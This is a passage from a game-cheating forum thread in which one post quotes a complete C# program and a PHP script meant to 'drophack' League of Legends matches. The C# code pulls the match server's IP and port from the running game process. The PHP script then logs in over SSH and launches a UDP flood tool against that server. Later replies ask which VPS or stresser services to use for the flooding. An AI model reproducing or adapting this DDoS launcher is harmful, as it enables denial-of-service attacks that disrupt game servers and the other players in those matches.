Page 2 of 2 FirstFirst 12
Results 16 to 21 of 21
  1. #16
    hobocow's Avatar
    Join Date
    Jul 2014
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    [QUOTE=bojicha;10466064]I'm releasing how this can be done for free, this is a sample program that will grab ip and post and sent it to a PHP Get Request that will ssh execute a command with that ip and port, games take average 5 minutes to drop but can bug out and become ghost games.
    Hardest region to drop the game you will find out is actually brazil.

    So now the code, just compile the following code with visual studio, it's c#

    Code:
    using System;
    using System.Collections.Generic;
    using System.Management;
    using System.Management.Instrumentation;
    using System.Net;
    using System.Text.RegularExpressions;
    
    namespace League_IP
    {
        internal class Lolip
        {
    
            private static void Main(string[] args)
            {
                Lolip ip1 = new Lolip();
                List<string> result = ip1.wmi_process();  
                int time = -1;
                if (resul*****unt >= 1)
                {
                    Console.WriteLine("IP: " + result[0]);
                    Console.WriteLine("Port: " + result[1]);
                    string password = ip1.Menu();
                    Console.WriteLine("Insert time of DDOS max 1200 sec");
                    string time_input = Console.ReadLine();
                    try
                    {
                        time = Convert.ToInt32(time_input);
                    }
                    catch (FormatException e)
                    {
                        Console.WriteLine("Input string is not a sequence of digits.");
                    }
                    catch (OverflowException e)
                    {
                        Console.WriteLine("The number cannot fit in an Int32.");
                    }
                    finally
                    {
                        if (time > 1200) time = 1200;
    
                    }
                    ip1.HTTPGet(result[0], result[1], password, time);
                }
    
            }
    
            private string Menu()
            {
    
                Console.WriteLine(" Insert your passwrord");
                string password = Console.ReadLine();
                password = password.Trim();
                string command = "";
                do
                {
                    Console.WriteLine("Write ddos to start");
                    command = Console.ReadLine();
                    command = command.Trim();
                } while (command != "ddos");
                
                return password;
            }
    
    
            private List<string> wmi_process()
            {
                string result = "";
                List<string> iport = new List<string>();
                try
                {
                    ManagementObjectSearcher searcher =
                        new ManagementObjectSearcher("root\\CIMV2",
                        "SELECT * FROM Win32_Process WHERE Caption = 'League of Legends.exe'");
    
                    foreach (ManagementObject queryObj in searcher.Get())
                    {
                        Object out_query = queryObj["CommandLine"];
                        result = out_query.ToString();
                    }
                }
                catch (ManagementException e)
                {
                    Console.WriteLine("An error occurred while querying for WMI data: " + e.Message);
                }
                if (result.Length <= 1) return iport;
    
                string pattern = "\"";
    
                IList<int> indeces = new List<int>();
    
                foreach (Match match in Regex.Matches(result, pattern))
                {
                    indeces.Add(match.Index);
                }
    
    
                int pos_split = indeces[indeces.Count - 2];
                string split = result.Substring(pos_split + 1);
                string ip_final = split.Substring(0, split.IndexOf(' ') + 1);
                string port = split.Substring(ip_final.Length, 4);
    
                ip_final = ip_final.Trim();
                port = port.Trim();
                iport.Add(ip_final);
                iport.Add(port);
    
                return iport;
            }
    
    
            private void HTTPGet(string target_ip, string port, string password, int time)
            {
    
                Console.WriteLine("Attack sent to target: " + target_ip + " on port " + port);
                string str_time = Convert.ToString(time);
                string address = string.Format(
               "127.0.0.1/ssh_remote.php?ip={0}&port={1}&password={2}&time={3}",
                Uri.EscapeDataString(target_ip),
                Uri.EscapeDataString(port),
                Uri.EscapeDataString(password),
                Uri.EscapeDataString(str_time));
                string text;
                using (WebClient client = new WebClient())
                {
                    text = client.DownloadString(address);
                }
                Console.WriteLine(text);
                Console.ReadLine();
    
            }
        }
    }
    The php code is like this:

    Code:
    <?php 
    include('Net/SSH2.php');
    
    $ip = '127.0.0.1'; 
    $user = 'root'; 
    $pass = 'pass'; 
    
    
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
        exit('Login Failed');
    }
    
    $target_ip = filter_var($_GET['ip'], FILTER_SANITIZE_STRING);
    $password =  filter_var($_GET['password'],FILTER_SANITIZE_STRING);
    $port = filter_var($_GET['port'],FILTER_SANITIZE_STRING);
    $time = filter_var($_GET['time'],FILTER_SANITIZE_STRING);
    
    
    
    if($password == "password_here" )
    {
    $ssh->setTimeout(3);
    
    // Sample ddos script used, was Used Geminid or also called g3m, use a pl script or something else or do a simple udp flood doesn't matter
    $ssh->exec('./molly -U -h '.$target_ip.' -p '.$port.','.$port.' -t '.$time.' &');
    
    echo $ssh->_disconnect(NET_SSH2_DISCONNECT_BY_APPLICATION)."\n";
    
    }
    else{
      echo "error wrong password" ;
    }
    
    ?>

    Hey Man , great tutorial thanks, I've been searching a drop back method for a few months now, almost 6 months, I wonder if this method still work or you just repost it from an old thread you found. I will be really glad if I can get in touch with you on skype : Christophe.tang1 . Thanks man, have a nice day.

  2. #17
    dezuree's Avatar
    Join Date
    May 2015
    Gender
    male
    Posts
    45
    Reputation
    10
    Thanks
    0
    My Mood
    Drunk
    WIll test it out!

  3. #18
    10pipolo10's Avatar
    Join Date
    Apr 2012
    Gender
    male
    Posts
    9
    Reputation
    10
    Thanks
    0
    hey dude
    do you now any free vps or free stresser wich i can use to drop ranked matchs os BR server?
    Last edited by Hunter; 07-03-2016 at 06:52 AM.

  4. #19
    ballhead's Avatar
    Join Date
    Jun 2015
    Gender
    female
    Posts
    4
    Reputation
    10
    Thanks
    0
    what VPS are you using? blazingfast dont offer ukraine servers and the amsterdam servers dont work with this

  5. #20
    UrgotShop's Avatar
    Join Date
    Jun 2015
    Gender
    male
    Location
    Summoner's Rift
    Posts
    88
    Reputation
    10
    Thanks
    9
    100MBps is enough to drophack a game ?
    Or I need a better VPS ?

  6. #21
    Geometrical's Avatar
    Join Date
    Jul 2012
    Gender
    male
    Location
    In the middle of nowhere.
    Posts
    1,034
    Reputation
    331
    Thanks
    10,335
    My Mood
    Chatty
    Just when I found something interesting the servers went offline, unlucky me..

    EDIT: I've tried it and it didn't work for me.
    Last edited by Geometrical; 07-14-2015 at 11:31 PM.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. [HELP]How to make your OWN Chams
    By true1playa in forum Combat Arms Hacks & Cheats
    Replies: 13
    Last Post: 08-07-2008, 03:15 PM
  2. [Tutorial] How to make your own undetected module in VB6
    By markfracasso11 in forum Visual Basic Programming
    Replies: 17
    Last Post: 10-15-2007, 09:34 AM
  3. [Tutorial] How to make your own undetected module in VB6
    By markfracasso11 in forum WarRock - International Hacks
    Replies: 22
    Last Post: 09-25-2007, 05:35 AM
  4. (TUT)how to make your own warrock menu
    By aprill27 in forum WarRock - International Hacks
    Replies: 0
    Last Post: 09-21-2007, 03:46 PM
  5. How to make your own radiostation?
    By nasir91 in forum General
    Replies: 3
    Last Post: 04-30-2007, 07:25 AM